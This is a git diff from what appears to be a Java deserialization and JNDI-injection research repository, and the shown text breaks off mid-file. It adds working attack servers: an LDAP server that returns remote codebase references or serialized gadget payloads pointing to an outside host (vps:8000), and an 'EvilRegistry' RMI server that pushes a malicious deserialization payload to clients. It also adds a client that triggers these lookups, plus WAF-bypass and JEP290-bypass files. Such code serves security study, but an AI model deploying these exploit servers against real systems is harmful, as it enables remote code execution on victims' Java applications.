+++++++ JNDI/Log4j2/pom.xml | 44 +++ .../Log4j2/src/main/java/com/example/App.java | 35 ++ .../src/main/java/com/example/BypassWaf.java | 31 ++ .../com/example/spring/WebApplication.java | 11 + .../spring/controller/IndexController.java | 31 ++ .../Log4j2/src/main/java/com/example/tmp.java | 21 ++ .../src/main/resources/application.yaml | 2 + JNDI/Log4j2/src/main/resources/log4j2.xml | 37 ++ MiddleWare/Tomcat/.gitignore | 38 ++ MiddleWare/Tomcat/.idea/.gitignore | 8 + MiddleWare/Tomcat/.idea/encodings.xml | 7 + MiddleWare/Tomcat/.idea/misc.xml | 14 + MiddleWare/Tomcat/.idea/vcs.xml | 4 + MiddleWare/Tomcat/pom.xml | 21 ++ .../src/main/java/com/test/servlet.java | 4 + .../Tomcat/src/main/java/com/test/tmp.java | 4 + .../Tomcat/src/main/webapp/WEB-INF/web.xml | 7 + MiddleWare/Tomcat/src/main/webapp/index.jsp | 16 + .../src/main/java/com/test/gadget/c3p0.java | 4 + 67 files changed, 1462 insertions(+), 418 deletions(-) create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.agent.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.ask.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.edit.xml rename JNDI/{JNDI_vul => JNDI}/.idea/uiDesigner.xml (100%) create mode 100644 JNDI/JNDI/ClassByteGen/AAAA.class create mode 100644 JNDI/JNDI/com/sun/proxy/$Proxy0.class create mode 100644 JNDI/JNDI/com/sun/proxy/$Proxy1.class delete mode 100644 JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java rename JNDI/{JNDI_vul/client/src/main/java/InitialC.java => JNDI/src/main/java/JndiClient.java} (53%) rename JNDI/{JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java => JNDI/src/main/java/LDAP/codebaseServer.java} (81%) create mode 100644 JNDI/JNDI/src/main/java/LDAP/deserServer.java create mode 100644 JNDI/JNDI/src/main/java/RMI/Client.java create mode 100644 JNDI/JNDI/src/main/java/RMI/EvilRegistry.java create mode 100644 JNDI/JNDI/src/main/java/RMI/MyRegistry.java create mode 100644 JNDI/JNDI/src/main/java/RMI/Server.java create mode 100644 JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java create mode 100644 JNDI/JNDI/src/main/java/RMIServer.java create mode 100644 JNDI/JNDI/src/main/java/remoteObj/Hello.java create mode 100644 JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java create mode 100644 JNDI/JNDI/src/main/java/tools/ClassByteGen.java create mode 100644 JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java create mode 100644 JNDI/JNDI/src/main/java/tools/Payload.java create mode 100644 JNDI/JNDI/src/main/java/tools/PayloadGen.java create mode 100644 JNDI/JNDI/src/main/java/tools/ReflectTools.java create mode 100644 JNDI/JNDI/src/main/java/tools/TemplatesGen.java delete mode 100644 JNDI/JNDI_vul/.idea/encodings.xml delete mode 100644 JNDI/JNDI_vul/client/pom.xml delete mode 100644 JNDI/JNDI_vul/pom.xml delete mode 100644 JNDI/JNDI_vul/server/pom.xml delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java rename JNDI/{JNDI_vul => Log4j2}/.gitignore (100%) rename JNDI/{JNDI_vul => Log4j2}/.idea/.gitignore (100%) create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.agent.xml create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.ask.xml create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.edit.xml create mode 100644 JNDI/Log4j2/.idea/encodings.xml rename JNDI/{JNDI_vul => Log4j2}/.idea/misc.xml (100%) rename JNDI/{JNDI_vul => Log4j2}/.idea/vcs.xml (100%) create mode 100644 JNDI/Log4j2/logs/app.log create mode 100644 JNDI/Log4j2/pom.xml create mode 100644 JNDI/Log4j2/src/main/java/com/example/App.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/BypassWaf.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/tmp.java create mode 100644 JNDI/Log4j2/src/main/resources/application.yaml create mode 100644 JNDI/Log4j2/src/main/resources/log4j2.xml create mode 100644 MiddleWare/Tomcat/.gitignore create mode 100644 MiddleWare/Tomcat/.idea/.gitignore create mode 100644 MiddleWare/Tomcat/.idea/encodings.xml create mode 100644 MiddleWare/Tomcat/.idea/misc.xml create mode 100644 MiddleWare/Tomcat/.idea/vcs.xml create mode 100644 MiddleWare/Tomcat/pom.xml create mode 100644 MiddleWare/Tomcat/src/main/java/com/test/servlet.java create mode 100644 MiddleWare/Tomcat/src/main/java/com/test/tmp.java create mode 100644 MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml create mode 100644 MiddleWare/Tomcat/src/main/webapp/index.jsp create mode 100644 hessian/src/main/java/com/test/gadget/c3p0.java diff --git a/JNDI/JNDI/.idea/copilot.data.migration.agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.edit.xml b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/misc.xml b/JNDI/JNDI/.idea/misc.xml index 8345e46..805d844 100644 --- a/JNDI/JNDI/.idea/misc.xml +++ b/JNDI/JNDI/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/uiDesigner.xml b/JNDI/JNDI/.idea/uiDesigner.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/uiDesigner.xml rename to JNDI/JNDI/.idea/uiDesigner.xml diff --git a/JNDI/JNDI/.idea/vcs.xml b/JNDI/JNDI/.idea/vcs.xml index b2bdec2..64713b8 100644 --- a/JNDI/JNDI/.idea/vcs.xml +++ b/JNDI/JNDI/.idea/vcs.xml @@ -2,5 +2,6 @@ + \ No newline at end of file diff --git a/JNDI/JNDI/ClassByteGen/AAAA.class b/JNDI/JNDI/ClassByteGen/AAAA.class new file mode 100644 index 0000000000000000000000000000000000000000..0a0e726ce7c5c88e15814b1f746f4e9ac5b6f48b GIT binary patch literal 338 zcmZXPK~KU!6ols$XvDG`e~6F{jNOt1d%AS^MqE^nHn^G$syNw|p)Hm0V~ zS<*j*JQlfB^EpEr2rZ;Za0lCh0nXtHl+ofE(|l1#HP$Itt=cc%+9J4y!vQM?J}PiQ m@YuE4TZs*7&C@l`URGOAmbuG>d=gJ9-A}al&lfy!aQO%24MM{J literal 0 HcmV?d00001 diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy0.class b/JNDI/JNDI/com/sun/proxy/$Proxy0.class new file mode 100644 index 0000000000000000000000000000000000000000..8592ed34d4d7677a3308d54e5db9f3a719f2c9fe GIT binary patch literal 2180 zcmZ`)ZC4Xl5PmLDHZ0pJk)V|qX%!7%vq)Q88``P}C6zZ>qz(4PWphaan_bv!P=7-I ziyzeXfYsB|&;3z7oqO+wT_B#ElbfBHedd{GW^Vrd@6F!;Zr}++=Tz0JhTkw`v-4Z_ zo^86eS2hE_>2fDD3*MgZ*kRT8=4`Lz@*qFD#?UeCmpFqy^VH!x!dYiHfBNO+z<>Ho z!+Qo8+H`b6qqBB{;bMzS3p}j&r92VhyA9hV#7vUV(#96?$&aoxunNOS3xv~L4ZM#J zx+w7(LUa6@S#Nmej$mb8k>n;c^cd)Z-i0*IF`SKyPzg0;7%s=wcj}_yJW;QbT-&6K z)q;8p#!=0W60T;Qr%eVv#Kmr0KtDrI%;>J~yWI9P3^EuS>S4`x8^oeLJGyS*5{7jQ z;Uk7K@mn)N;0GEmQ!irUO2Z4QHGb4p4I>QaV*hF-@SoTlF4u64As0KEsyy^c+;Q!I zmySXcV51BdlDZtl&`gOD8P_p}>taME8B(Edg+bLTGxTOh6KW`H-at-ujm9a_HRaXt zseqxcv=eYU)fY#~DQcxWbl1pB#y{qmT|1ux`fPJ(^KpzR5Dmo^#t zj&S78L_vfxg|BtwK}(g9BAra5;dWEls&5vS5+dCd#3!i!ie0a$HKR5b4BS(^z9U!F z3uT856fi3ieNVfr*JI z!JUZ6V3c5zMaZAMIGh)-#4mzP6Ker0P610-{|VTe_#%R}PVl~^c=x}?w@vDIUL<*o z;!pD)z_hf-{5wd*X_9^hvr#G`uaI&$s$i~JL4F_ipPwuugN!UfoT7*f`i>Qm!aNot z#$D?*~NW*0MXA${}ihP9)6?aR;IY)7GFG<^S faeN;H-Kqa3|+G|r{>*dNTrr`te2K) zTTaDv`L@kVo|$uAijw8kg!9mH$~Jei>2-$AIZ@^e`oeCBzmS&=hJmw>S6#9DtA=w1 z7&>%xK_gqAX1LNO(=zv}qMRi{{FkO>6Jjz-Xk}}M_+-=18CaEJybZ!xt_IHILN_J8 zNN6QdHycgId?8tx*L`x+8hQOAW*@Byy$U=UXsdP7DJgs{2gXc%TNw$x$WvYW&rmP$W2a1En6M(`oS z#qiaF>k3!H7|kMdt~DL6R_Di4)iBO*IlO;Tb;T=d%jOzxFieIQt*$(E%DiM-E-xR4 zM!?bxgVDYm$B?F^L?(1(a8pWTh9T~Wg6Gzp3PWEi9qEShW(`cLsgax_Q&YDZK9w+2 z1XHydRi#$yM$W+J>eUw~dYE%OUg6Y_FX=_i@%;W7n8j@!S$sv#*^(Ws3Bk|?_$epl zs!Xbh#c}^cgXe6k(aX{bEb5rYH*xeZbXT~ibi#12 z4M0>p3LpyEnoOWH1K;A2#9oTSjN=x=wQ!1gQD~N`Dl#&*RfenY2~r|jqc4F^veB?A z+`tn|=}6(}sSR!w?9cj{jsm`87!8qq@_FGcil$SJC%VsuK7uY+t?X5tX> zefkA-(!cceq6bD0_lV+T{Ef^TT*~~8zRthUUyMx@-eRZ||6t?*AMG72|A|cT<{>^g z@`HykgzNN3+K+uZOwEcWFfkP*xE~N14ie0;0Qs}uj+P`W@e5!R#9G2iD`Dw#b_(_u zZU?aQ0qkf1d#44PJ;2?))5u9AePn4RauWR~kmL9o_X1=$KweKg_yZ3UIcms!G3Fl% z2UvcMK6R0g(S`4rQI3^k$DMtutWcad!1^JIlFVjs_~D4MfVOfLkA0iN2HDnR@IO_F BtO)=B literal 0 HcmV?d00001 diff --git a/JNDI/JNDI/pom.xml b/JNDI/JNDI/pom.xml index fa7063a..1a7687f 100644 --- a/JNDI/JNDI/pom.xml +++ b/JNDI/JNDI/pom.xml @@ -4,7 +4,7 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - com.example + com.test JNDI 1.0-SNAPSHOT @@ -14,12 +14,47 @@ UTF-8 - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - - + + + com.alibaba + fastjson + 1.2.47 + + + org.javassist + javassist + 3.30.2-GA + + + org.slf4j + slf4j-api + 2.0.17 + + + org.apache.tomcat.embed + tomcat-embed-core + 9.0.38 + + + com.h2database + h2 + 2.3.232 + + + org.hsqldb + hsqldb + 2.7.3 + + + com.alibaba + druid + 1.2.23 + + + com.unboundid + unboundid-ldapsdk + 3.2.0 + + \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java b/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java deleted file mode 100644 index 4118c5a..0000000 --- a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java +++ /dev/null @@ -1,36 +0,0 @@ -package JNDI_Develop; - -import javax.naming.Context; -import javax.naming.NamingException; -import javax.naming.directory.Attributes; -import javax.naming.directory.DirContext; -import javax.naming.directory.InitialDirContext; -import java.util.Hashtable; - - -public class DNSContextFactoryTest { - public static void main(String[] args) { - // 创建环境变量对象 - Hashtable env = new Hashtable(); - - // 设置JNDI初始化工厂类名 - env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); - - // 设置JNDI提供服务的URL地址,这里可以设置解析的DNS服务器地址 - env.put(Context.PROVIDER_URL, "dns://114.114.114.114/"); - - try { - // 创建JNDI目录服务对象 - DirContext context = new InitialDirContext(env); - - // 获取DNS解析记录测试 - Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); - Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); - - System.out.println(attrs1); - System.out.println(attrs2); - } catch (NamingException e) { - e.printStackTrace(); - } - } -} diff --git a/JNDI/JNDI_vul/client/src/main/java/InitialC.java b/JNDI/JNDI/src/main/java/JndiClient.java similarity index 53% rename from JNDI/JNDI_vul/client/src/main/java/InitialC.java rename to JNDI/JNDI/src/main/java/JndiClient.java index 4203ca3..6b264e7 100644 --- a/JNDI/JNDI_vul/client/src/main/java/InitialC.java +++ b/JNDI/JNDI/src/main/java/JndiClient.java @@ -1,9 +1,11 @@ import javax.naming.InitialContext; import javax.naming.NamingException; -public class InitialC { +public class JndiClient { public static void main(String[] args) throws NamingException { + String rmiHost = "rmi://127.0.0.1:1099/Calc123"; + String ldapHost = "ldap://127.0.0.1:1389/anything"; InitialContext initialContext = new InitialContext(); - initialContext.lookup("ldap://127.0.0.1:1389/Calc"); + initialContext.lookup(ldapHost); } } diff --git a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java similarity index 81% rename from JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java rename to JNDI/JNDI/src/main/java/LDAP/codebaseServer.java index 12d93df..726fd3d 100644 --- a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java +++ b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java @@ -1,11 +1,5 @@ -package normal_ldap; +package LDAP; -import java.net.InetAddress; -import java.net.MalformedURLException; -import java.net.URL; -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; @@ -15,25 +9,23 @@ import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; -/** - * LDAP server implementation returning JNDI references - * - * @author mbechler - * - */ -public class JNDILdapServer { - +public class codebaseServer { private static final String LDAP_BASE = "dc=example,dc=com"; - public static void main (String[] args) { - int port = 1389; String url = "http://127.0.0.1:7777/#Calc"; + int port = 1389; try { InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( - "listen", //$NON-NLS-1$ - InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ + "listen", + InetAddress.getByName("0.0.0.0"), port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), @@ -41,32 +33,23 @@ public static void main (String[] args) { config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ + System.out.println("Listening on 0.0.0.0:" + port); ds.startListening(); - } catch ( Exception e ) { e.printStackTrace(); } } - private static class OperationInterceptor extends InMemoryOperationInterceptor { - private URL codebase; - /** - * - */ - public OperationInterceptor ( URL cb ) { + * */ public OperationInterceptor ( URL cb ) { this.codebase = cb; } - /** * {@inheritDoc} - * - * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) - */ - @Override + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override public void processSearchResult ( InMemoryInterceptedSearchResult result ) { String base = result.getRequest().getBaseDN(); Entry e = new Entry(base); @@ -76,23 +59,22 @@ public void processSearchResult ( InMemoryInterceptedSearchResult result ) { catch ( Exception e1 ) { e1.printStackTrace(); } - } - protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); - e.addAttribute("javaClassName", "Calc"); + e.addAttribute("javaClassName", "Exploit"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos > 0 ) { cbstring = cbstring.substring(0, refPos); } e.addAttribute("javaCodeBase", cbstring); - e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ + e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", this.codebase.getRef()); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } + } } \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/LDAP/deserServer.java b/JNDI/JNDI/src/main/java/LDAP/deserServer.java new file mode 100644 index 0000000..2ce96bd --- /dev/null +++ b/JNDI/JNDI/src/main/java/LDAP/deserServer.java @@ -0,0 +1,111 @@ +package LDAP; + +import com.unboundid.util.Base64; +import com.unboundid.ldap.listener.InMemoryDirectoryServer; +import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; +import com.unboundid.ldap.listener.InMemoryListenerConfig; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPException; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import tools.PayloadGen; +import tools.ReflectTools; + +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; +import java.text.ParseException; + +public class deserServer { + + private static final String LDAP_BASE = "dc=example,dc=com"; + + + public static void main (String[] args) { + + String url = "http://vps:8000/#ExportObject"; + int port = 1389; + + + try { + InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); + config.setListenerConfigs(new InMemoryListenerConfig( + "listen", + InetAddress.getByName("0.0.0.0"), + port, + ServerSocketFactory.getDefault(), + SocketFactory.getDefault(), + (SSLSocketFactory) SSLSocketFactory.getDefault())); + + config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); + InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); + System.out.println("Listening on 0.0.0.0:" + port); + ds.startListening(); + + } + catch ( Exception e ) { + e.printStackTrace(); + } + } + + private static class OperationInterceptor extends InMemoryOperationInterceptor { + + private URL codebase; + + + /** + * */ public OperationInterceptor ( URL cb ) { + this.codebase = cb; + } + + + /** + * {@inheritDoc} + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override + public void processSearchResult ( InMemoryInterceptedSearchResult result ) { + String base = result.getRequest().getBaseDN(); + Entry e = new Entry(base); + try { + sendResult(result, base, e); + } + catch ( Exception e1 ) { + e1.printStackTrace(); + } + + } + + + protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception { + URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); + System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); + e.addAttribute("javaClassName", "Exploit"); + String cbstring = this.codebase.toString(); + int refPos = cbstring.indexOf('#'); + if ( refPos > 0 ) { + cbstring = cbstring.substring(0, refPos); + } + + // Payload1: 利用LDAP+Reference Factory +// e.addAttribute("javaCodeBase", cbstring); +// e.addAttribute("objectClass", "javaNamingReference"); +// e.addAttribute("javaFactory", this.codebase.getRef()); + + // Payload2: 返回序列化Gadget + try { + e.addAttribute("javaSerializedData", ReflectTools.ser2bytes(PayloadGen.getPayload())); + } catch (ParseException exception) { + exception.printStackTrace(); + } + + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + + } +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/Client.java b/JNDI/JNDI/src/main/java/RMI/Client.java new file mode 100644 index 0000000..3ca3c85 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Client.java @@ -0,0 +1,23 @@ +package RMI; + +import java.rmi.NotBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; + +public class Client { + public static void main(String[] args) throws Exception { + serverAttackClientWithJRMP(); + } + + // 从registry获取的stub指向恶意skel,通过DGC JRMP,实现server打client + public static void serverAttackClientWithJRMP() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + registry.lookup("951d14"); + } + + public static void rmiDeser() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 50388); + registry.lookup("c4e578"); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java new file mode 100644 index 0000000..704bd81 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java @@ -0,0 +1,350 @@ +package RMI; + +import java.io.BufferedInputStream; +import java.io.BufferedOutputStream; +import java.io.DataInputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamClass; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.net.Socket; +import java.net.SocketException; +import java.net.URL; +import java.net.URLClassLoader; +import java.rmi.MarshalException; +import java.rmi.server.ObjID; +import java.rmi.server.UID; +import javax.net.ServerSocketFactory; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import tools.PayloadGen; + +// 在client lookup后,直接返回恶意stub,进行反序列化 +public class EvilRegistry implements Runnable { + public static void main(String[] args) { + //before you start it, you should set vm options:"--add-opens=java.base/sun.nio.ch=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=jdk.unsupported/sun.misc=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED" + EvilRegistry.start(); + } + private static final Logger log = LoggerFactory.getLogger(EvilRegistry.class); + public String ip; + public int port; + private ServerSocket ss; + private final Object waitLock = new Object(); + private boolean exit; + private boolean hadConnection; + private static EvilRegistry serverInstance; + + public EvilRegistry(String ip, int port) { + try { + this.ip = ip; + this.port = port; + this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port); + } catch (Exception e) { + e.printStackTrace(); + } + + } + + public static synchronized void start() { + serverInstance = new EvilRegistry("0.0.0.0", 8899); + Thread serverThread = new Thread(serverInstance); + serverThread.start(); + log.warn("[RMI RMI.Server] is already running."); + } + + public static synchronized void stop() { + if (serverInstance != null) { + serverInstance.exit = true; + + try { + serverInstance.ss.close(); + } catch (IOException e) { + e.printStackTrace(); + } + + serverInstance = null; + System.out.println("[RMI RMI.Server] stopped."); + } + + } + + public boolean waitFor(int i) { + try { + if (this.hadConnection) { + return true; + } else { + System.out.println("[RMI RMI.Server] Waiting for connection"); + synchronized(this.waitLock) { + this.waitLock.wait((long)i); + } + + return this.hadConnection; + } + } catch (InterruptedException var5) { + return false; + } + } + + public void close() { + this.exit = true; + + try { + this.ss.close(); + } catch (IOException var4) { + } + + synchronized(this.waitLock) { + this.waitLock.notify(); + } + } + + public void run() { + System.out.println("[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899"); + + try { + Socket s = null; + + try { + while(!this.exit && (s = this.ss.accept()) != null) { + try { + s.setSoTimeout(5000); + InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress(); + System.out.println("[RMI RMI.Server] Have connection from " + remote); + InputStream is = s.getInputStream(); + InputStream bufIn = (InputStream)(is.markSupported() ? is : new BufferedInputStream(is)); + bufIn.mark(4); + DataInputStream in = new DataInputStream(bufIn); + Throwable var6 = null; + + try { + int magic = in.readInt(); + short version = in.readShort(); + if (magic == 1246907721 && version == 2) { + OutputStream sockOut = s.getOutputStream(); + BufferedOutputStream bufOut = new BufferedOutputStream(sockOut); + DataOutputStream out = new DataOutputStream(bufOut); + Throwable var12 = null; + + try { + byte protocol = in.readByte(); + switch (protocol) { + case 75: + out.writeByte(78); + if (remote.getHostName() != null) { + out.writeUTF(remote.getHostName()); + } else { + out.writeUTF(remote.getAddress().toString()); + } + + out.writeInt(remote.getPort()); + out.flush(); + in.readUTF(); + in.readInt(); + case 76: + this.doMessage(s, in, out); + bufOut.flush(); + out.flush(); + break; + case 77: + default: + System.out.println("[RMI RMI.Server] Unsupported protocol"); + s.close(); + } + } catch (Throwable var88) { + var12 = var88; + throw var88; + } finally { + if (out != null) { + if (var12 != null) { + try { + out.close(); + } catch (Throwable var87) { + var12.addSuppressed(var87); + } + } else { + out.close(); + } + } + + } + } else { + s.close(); + } + } catch (Throwable var90) { + var6 = var90; + throw var90; + } finally { + if (in != null) { + if (var6 != null) { + try { + in.close(); + } catch (Throwable var86) { + var6.addSuppressed(var86); + } + } else { + in.close(); + } + } + + } + } catch (InterruptedException var92) { + return; + } catch (Exception e) { + e.printStackTrace(System.err); + } finally { + System.out.println("[RMI RMI.Server] Closing connection"); + s.close(); + } + } + + return; + } finally { + if (s != null) { + s.close(); + } + + if (this.ss != null) { + this.ss.close(); + } + + } + } catch (SocketException var96) { + } catch (Exception e) { + e.printStackTrace(System.err); + } + + } + + private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + System.out.println("[RMI RMI.Server] Reading message..."); + int op = in.read(); + switch (op) { + case 80: + this.doCall(s, in, out); + break; + case 81: + case 83: + default: + throw new IOException("unknown transport op " + op); + case 82: + out.writeByte(83); + break; + case 84: + UID.read(in); + } + + s.close(); + } + + private void doCall(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + ObjectInputStream ois = new ObjectInputStream(in) { + protected Class resolveClass(ObjectStreamClass desc) throws IOException { + if ("[Ljava.rmi.server.ObjID;".equals(desc.getName())) { + return ObjID[].class; + } else if ("java.rmi.server.ObjID".equals(desc.getName())) { + return ObjID.class; + } else if ("java.rmi.server.UID".equals(desc.getName())) { + return UID.class; + } else if ("java.lang.String".equals(desc.getName())) { + return String.class; + } else { + throw new IOException("Not allowed to read object"); + } + } + }; + + ObjID read; + try { + read = ObjID.read(ois); + } catch (IOException e) { + throw new MarshalException("unable to read objID", e); + } + + if (read.hashCode() == 2) { + handleDGC(ois); + } else if (read.hashCode() == 0) { + if (this.handleRMI(s, ois, out)) { + this.hadConnection = true; + synchronized(this.waitLock) { + this.waitLock.notifyAll(); + return; + } + } + + s.close(); + } + + } + + private boolean handleRMI(Socket s, ObjectInputStream ois, DataOutputStream out) throws Exception { + int method = ois.readInt(); + ois.readLong(); + if (method != 2) { + return false; + } else { + String object = (String)ois.readObject(); + out.writeByte(81); + + Object obj; + try (ObjectOutputStream oos = new MarshalOutputStream(out, "evil")) { + oos.writeByte(1); + (new UID()).write(oos); + String path = "/" + object; + System.out.println("[RMI RMI.Server] Send payloadData for " + path); + System.out.println(); + new Object(); + obj = PayloadGen.getPayload();//替换为序列化数据 + oos.writeObject(obj); + oos.flush(); + out.flush(); + return true; + } + } + } + private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException { + ois.readInt(); + ois.readLong(); + } + static final class MarshalOutputStream extends ObjectOutputStream { + private String sendUrl; + + public MarshalOutputStream(OutputStream out, String u) throws IOException { + super(out); + this.sendUrl = u; + } + + MarshalOutputStream(OutputStream out) throws IOException { + super(out); + } + + protected void annotateClass(Class cl) throws IOException { + if (this.sendUrl != null) { + this.writeObject(this.sendUrl); + } else if (!(cl.getClassLoader() 